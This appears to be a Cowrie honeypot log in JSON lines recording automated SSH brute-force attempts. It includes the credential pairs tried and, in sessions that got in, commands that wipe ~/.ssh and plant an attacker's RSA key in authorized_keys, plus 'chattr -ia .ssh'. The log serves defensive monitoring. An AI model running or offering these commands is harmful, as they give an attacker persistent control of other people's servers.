{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:50:01.952236Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:50:02.025567Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:02.026842Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":39299,"dst_ip":"1.2.3.4","dst_port":22,"session":"507c268823c7","protocol":"ssh","message":"New connection: 213.6.203.226:39299 (1.2.3.4:22) [session: 507c268823c7]","sensor":"my-vps","timestamp":"2025-09-09T05:50:02.089736Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:50:02.090941Z","src_ip":"213.6.203.226","session":"507c268823c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:50:02.162852Z","src_ip":"213.6.203.226","session":"507c268823c7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:50:02.496871Z","src_ip":"213.6.203.226","session":"507c268823c7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:03.567159Z","src_ip":"213.6.203.226","session":"507c268823c7"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":54859,"dst_ip":"1.2.3.4","dst_port":22,"session":"f71b5676eb3f","protocol":"ssh","message":"New connection: 213.6.203.226:54859 (1.2.3.4:22) [session: f71b5676eb3f]","sensor":"my-vps","timestamp":"2025-09-09T05:50:03.646322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:50:03.647274Z","src_ip":"213.6.203.226","session":"f71b5676eb3f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:50:03.724249Z","src_ip":"213.6.203.226","session":"f71b5676eb3f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:50:04.080979Z","src_ip":"213.6.203.226","session":"f71b5676eb3f"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:04.150088Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:04.155409Z","src_ip":"213.6.203.226","session":"f71b5676eb3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56236,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bd75ac26f46","protocol":"ssh","message":"New connection: 212.227.235.229:56236 (1.2.3.4:22) [session: 6bd75ac26f46]","sensor":"my-vps","timestamp":"2025-09-09T05:50:05.703382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:50:05.704142Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:50:05.943836Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.login.success","username":"root","password":"Ws123456@","message":"login attempt [root/Ws123456@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:50:06.946559Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.session.closed","duration":31.235655784606934,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:07.007854Z","src_ip":"103.97.47.51","session":"7e23bec3f4ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:50:07.484194Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:50:07.484878Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:50:07.486070Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:07.966456Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:50:08.226921Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:50:08.227661Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:50:08.469999Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:08.470965Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57112,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b24423236dd","protocol":"ssh","message":"New connection: 212.227.235.229:57112 (1.2.3.4:22) [session: 4b24423236dd]","sensor":"my-vps","timestamp":"2025-09-09T05:50:08.724461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:50:08.725325Z","src_ip":"212.227.235.229","session":"4b24423236dd"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:50:08.974837Z","src_ip":"212.227.235.229","session":"4b24423236dd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:50:10.017405Z","src_ip":"212.227.235.229","session":"4b24423236dd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:11.269388Z","src_ip":"212.227.235.229","session":"4b24423236dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57814,"dst_ip":"1.2.3.4","dst_port":22,"session":"77639aa10c30","protocol":"ssh","message":"New connection: 212.227.235.229:57814 (1.2.3.4:22) [session: 77639aa10c30]","sensor":"my-vps","timestamp":"2025-09-09T05:50:11.501879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:50:11.503035Z","src_ip":"212.227.235.229","session":"77639aa10c30"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:50:11.741726Z","src_ip":"212.227.235.229","session":"77639aa10c30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43758,"dst_ip":"1.2.3.4","dst_port":22,"session":"d914eaa40799","protocol":"ssh","message":"New connection: 212.227.235.229:43758 (1.2.3.4:22) [session: d914eaa40799]","sensor":"my-vps","timestamp":"2025-09-09T05:50:12.364471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:50:12.365190Z","src_ip":"212.227.235.229","session":"d914eaa40799"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:50:12.443166Z","src_ip":"212.227.235.229","session":"d914eaa40799"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:50:12.736700Z","src_ip":"212.227.235.229","session":"77639aa10c30"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T05:50:12.756587Z","src_ip":"212.227.235.229","session":"d914eaa40799"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:12.976456Z","src_ip":"212.227.235.229","session":"6bd75ac26f46"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:12.977359Z","src_ip":"212.227.235.229","session":"77639aa10c30"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:13.837316Z","src_ip":"212.227.235.229","session":"d914eaa40799"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53320,"dst_ip":"1.2.3.4","dst_port":22,"session":"40386cc7f3f4","protocol":"ssh","message":"New connection: 212.227.235.229:53320 (1.2.3.4:22) [session: 40386cc7f3f4]","sensor":"my-vps","timestamp":"2025-09-09T05:50:38.745975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:50:38.746820Z","src_ip":"212.227.235.229","session":"40386cc7f3f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:50:38.952586Z","src_ip":"212.227.235.229","session":"40386cc7f3f4"}
{"eventid":"cowrie.login.failed","username":"debian","password":"Welcome1","message":"login attempt [debian/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T05:50:40.119547Z","src_ip":"212.227.235.229","session":"40386cc7f3f4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:41.289115Z","src_ip":"212.227.235.229","session":"40386cc7f3f4"}
{"eventid":"cowrie.session.connect","src_ip":"45.71.127.215","src_port":58006,"dst_ip":"1.2.3.4","dst_port":23,"session":"da52bf8accf8","protocol":"telnet","message":"New connection: 45.71.127.215:58006 (1.2.3.4:23) [session: da52bf8accf8]","sensor":"my-vps","timestamp":"2025-09-09T05:50:41.410773Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40864,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b2bde1d5eea","protocol":"ssh","message":"New connection: 212.227.235.229:40864 (1.2.3.4:22) [session: 9b2bde1d5eea]","sensor":"my-vps","timestamp":"2025-09-09T05:50:46.167470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:50:46.168727Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
